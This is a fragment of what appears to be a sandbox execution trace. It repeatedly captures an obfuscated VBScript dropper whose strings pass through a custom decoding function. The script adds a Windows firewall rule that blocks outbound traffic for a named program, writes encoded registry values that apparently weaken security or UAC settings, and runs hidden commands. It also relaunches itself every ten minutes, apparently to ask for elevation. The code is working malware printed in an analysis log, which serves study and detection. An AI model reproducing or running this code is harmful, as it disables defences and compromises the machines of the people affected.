\r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0226.297] wcsncmp (_String1=") - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0226.298] wcsncmp (_String1=" - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.298] wcsncmp (_String1="- 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 32 [0226.298] wcsncmp (_String1=" 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = 